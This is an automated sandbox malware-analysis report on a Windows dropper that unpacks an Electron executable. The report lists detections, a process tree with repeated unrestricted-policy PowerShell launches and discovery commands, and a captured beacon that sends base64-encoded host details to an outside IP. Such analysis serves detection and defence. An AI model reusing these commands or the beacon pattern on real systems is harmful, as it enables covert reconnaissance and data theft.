Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AyqwnIUrcz.exe

Overview

General Information

Sample name:AyqwnIUrcz.exe
renamed because original name is a hash value
Original sample name:d8ae7fbb8db3b027a832be6f1acc44c7f5aebfdcb306cd297f7c30f1594d9c45.exe
Analysis ID:1574722
MD5:1e047b85b671cc99d941c13865f069db
SHA1:7e23e9ffbdfd30537546385e5cd475f58b06e7ae
SHA256:d8ae7fbb8db3b027a832be6f1acc44c7f5aebfdcb306cd297f7c30f1594d9c45
Tags:ConsolHQLTDexeuser-JAMESWT_MHT
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Drops large PE files
Loading BitLocker PowerShell Module
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • AyqwnIUrcz.exe (PID: 6244 cmdline: "C:\Users\user\Desktop\AyqwnIUrcz.exe" MD5: 1E047B85B671CC99D941C13865F069DB)
    • IoNixNginx.exe (PID: 1964 cmdline: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe MD5: 4DE03596272B7D7B70FF34893D072F21)
      • cmd.exe (PID: 5896 cmdline: C:\Windows\system32\cmd.exe /d /s /c "chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 6788 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • IoNixNginx.exe (PID: 3628 cmdline: "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 4DE03596272B7D7B70FF34893D072F21)
      • cmd.exe (PID: 3968 cmdline: C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7164 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4456 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1156 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • IoNixNginx.exe (PID: 5076 cmdline: "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --mojo-platform-channel-handle=2184 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 4DE03596272B7D7B70FF34893D072F21)
      • cmd.exe (PID: 3968 cmdline: C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • findstr.exe (PID: 6016 cmdline: findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • powershell.exe (PID: 3640 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5772 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5348 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2260 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4876 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2468 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1056 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7552 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7672 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7804 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7812 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7840 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7848 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7884 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7912 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7920 cmdline: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, ParentProcessId: 1964, ParentProcessName: IoNixNginx.exe, ProcessCommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 7164, ProcessName: powershell.exe
Sigma detected: Console CodePage Lookup Via CHCP
Source: Process startedAuthor: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "chcp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5896, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 6788, ProcessName: chcp.com
Sigma detected: Use Short Name Path in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, ParentCommandLine: "C:\Users\user\Desktop\AyqwnIUrcz.exe", ParentImage: C:\Users\user\Desktop\AyqwnIUrcz.exe, ParentProcessId: 6244, ParentProcessName: AyqwnIUrcz.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, ProcessId: 1964, ProcessName: IoNixNginx.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe, ParentProcessId: 1964, ParentProcessName: IoNixNginx.exe, ProcessCommandLine: powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 7164, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: AyqwnIUrcz.exeReversingLabs: Detection: 18%
Source: AyqwnIUrcz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user~1\AppData\Local\Temp\nslCD8A.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\LICENSE.electron.txtJump to behavior
Source: AyqwnIUrcz.exeStatic PE information: certificate valid
Source: AyqwnIUrcz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile opened: C:\Users\user~1\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile opened: C:\Users\user~1\AppData\LocalJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile opened: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\resourcesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile opened: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile opened: C:\Users\user~1\AppData\Local\TempJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile opened: C:\Users\user~1Jump to behavior
Source: Joe Sandbox ViewIP Address: 172.64.41.3 172.64.41.3
Source: unknownTCP traffic detected without corresponding DNS query: 159.100.18.192
Source: unknownTCP traffic detected without corresponding DNS query: 159.100.18.192
Source: unknownTCP traffic detected without corresponding DNS query: 159.100.18.192
Source: unknownTCP traffic detected without corresponding DNS query: 159.100.18.192
Source: unknownTCP traffic detected without corresponding DNS query: 159.100.18.192
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: www.google.comConnection: close
Source: global trafficHTTP traffic detected: GET /login.php?event=init&id=cHJlZmluYWw=&data=OCBHQl9bb2JqZWN0IE9iamVjdF1fWU5SODJfdHJ1ZV8xMjgweDEwMjRfV2luZG93cyAxMCBQcm9fMTA4IG1pbnV0ZXMgKDAuODAgaG91cnMpX0M6XFVzZXJzXGZyb250ZGVza18wNjY2NTZfZnJvbnRkZXNrX1dpbmRvd3NfTlRfeDY0XzEwLjAuMTkwNDVfQzpcVXNlcnNcZnJvbnRkZXNrXEFwcERhdGFcUm9hbWluZ19DOlxVc2Vyc1xGUk9OVER+MVxBcHBEYXRhXExvY2FsXFRlbXBfRlJPTlRERVNLLVBDX19JbnRlbDY0IEZhbWlseSA2IE1vZGVsIDE0MyBTdGVwcGluZyA4LCBHZW51aW5lSW50ZWxfQU1ENjRfQzpfMl9DOlxVc2Vyc1xGUk9OVER+MVxBcHBEYXRhXExvY2FsXFRlbXBcMnB2dFBFUzV0N2FvVjNlWG5Xcnl3eXRGaTEwXElvTml4TmdpbnguZXhl HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: 159.100.18.192Connection: close
Source: IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: chttps://www.baidu.com/s?ie={inputEncoding}&wd={searchTerms}https://www.baidu.com/s?ie={inputEncoding}&word={searchTerms}https://www.baidu.com/{google:pathWildcard}/s?ie={inputEncoding}&word={searchTerms}sigs_ssp{google:baseURL}#q={searchTerms}{google:baseURL}search#q={searchTerms}{google:baseURL}webhp#q={searchTerms}{google:baseURL}s#q={searchTerms}{google:baseURL}s?q={searchTerms}https://go.mail.ru/msearch?q={searchTerms}&{mailru:referralID}https://m.so.com/s?ie={inputEncoding}&q={searchTerms}https://m.so.com/index.php?ie={inputEncoding}&q={searchTerms}https://m.sogou.com/web/{google:pathWildcard}?ie={inputEncoding}&keyword={searchTerms}http://searchatlas.centrum.cz/?q={searchTerms}http://hladaj.atlas.sk/fulltext/?phrase={searchTerms}http://isearch.avg.com/search?q={searchTerms}http://search.avg.com/route/?q={searchTerms}&lng={language}https://isearch.avg.com/search?q={searchTerms}https://search.avg.com/route/?q={searchTerms}&lng={language}http://search.babylon.com/?q={searchTerms}http://search.conduit.com/Results.aspx?q={searchTerms}http://www.delfi.lt/paieska/?q={searchTerms}http://www.delta-search.com/?q={searchTerms}http://www1.delta-search.com/home?q={searchTerms}http://www1.delta-search.com/?q={searchTerms}http://www2.delta-search.com/home?q={searchTerms}http://www2.delta-search.com/?q={searchTerms}http://www.search.delta-search.com/home?q={searchTerms}http://www.search.delta-search.com/?q={searchTerms}http://www.yhs.delta-search.com/home?q={searchTerms}http://www.yhs.delta-search.com/?q={searchTerms}http://mixidj.delta-search.com/home?q={searchTerms}http://mixidj.delta-search.com/?q={searchTerms}http://search.goo.ne.jp/web.jsp?MT={searchTerms}&IE={inputEncoding}http://search.goo.ne.jp/sgt.jsp?MT={searchTerms}&CL=plugin&FM=json&IE={inputEncoding}http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Default.aspx#q={searchTerms}http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Result.aspx#q={searchTerms}http://start.iminent.com/?q={searchTerms}http://start.iminent.com/StartWeb/1033/homepage/#q={searchTerms}http://search.incredibar.com/?q={searchTerms}http://mystart.incredibar.com/?search={searchTerms}https://www.neti.ee/cgi-bin/otsing?query={searchTerms}&src=webhttps://www.neti.ee/api/suggestOS?suggestVersion=1&suggestQuery={searchTerms}https://nova.rambler.ru/search?query={searchTerms}https://nova.rambler.ru/suggest?v=3&query={searchTerms}http://www.search-results.com/web?q={searchTerms}http://search.snap.do/?q={searchTerms}http://feed.snapdo.com/?q={searchTerms}http://feed.snap.do/?q={searchTerms}http://en.softonic.com/s/{searchTerms}http://www.softonic.com/s/{searchTerms}http://www.softonic.com.br/s/{searchTerms}http://buscador.softonic.com/?q={searchTerms}http://nl.softonic.com/s/{searchTerms}https://search.softonic.com/?q={searchTerms}https://en.softonic.com/s/{searchTerms}https://www.softonic.com/s/{searchTerms}https://www.softonic.com.br/s/{searchTerms}https://buscador.softonic.com/?q={searchTerms}https://nl.softonic.com/s/{s
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://ak.apnstatic.com/media/images/favicon_search-results.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://ak.apnstatic.com/media/images/favicon_search-results.icohttp://dts.search-results.com/sr?lng=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://arianna.libero.it/search/abin/integrata.cgi?query=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://autocomplete.nigma.ru/complete/query_help.php?suggest=true&q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://buscador.terra.es/Default.aspx?source=Search&ca=s&query=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://buscador.terra.es/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://buscador.terra.es/favicon.icohttp://buscador.terra.es/Default.aspx?source=Search&ca=s&query=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://buscar.terra.com.ar/Default.aspx?source=Search&ca=s&query=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://buscar.terra.com.ar/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://buscar.terra.com.ar/favicon.icohttp://buscar.terra.com.ar/Default.aspx?source=Search&ca=s&que
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://clients3.google.com/cert_upload_json
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://crbug.com/1138528
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-hpkp-report-only
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-hpkp-report-only#
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://dts.search-results.com/sr?lng=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://find.in.gr/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.png
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.pnghttp://find.in.gr/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://g1.delphi.lv/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://g1.delphi.lv/favicon.icohttp://www.delfi.lv/search_all/?ie=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://i.rl0.ru/2011/icons/rambler.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://i.rl0.ru/2011/icons/rambler.icohttp://nova.rambler.ru/search?query=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://i.wp.pl/a/i/stg/500/favicon.ico
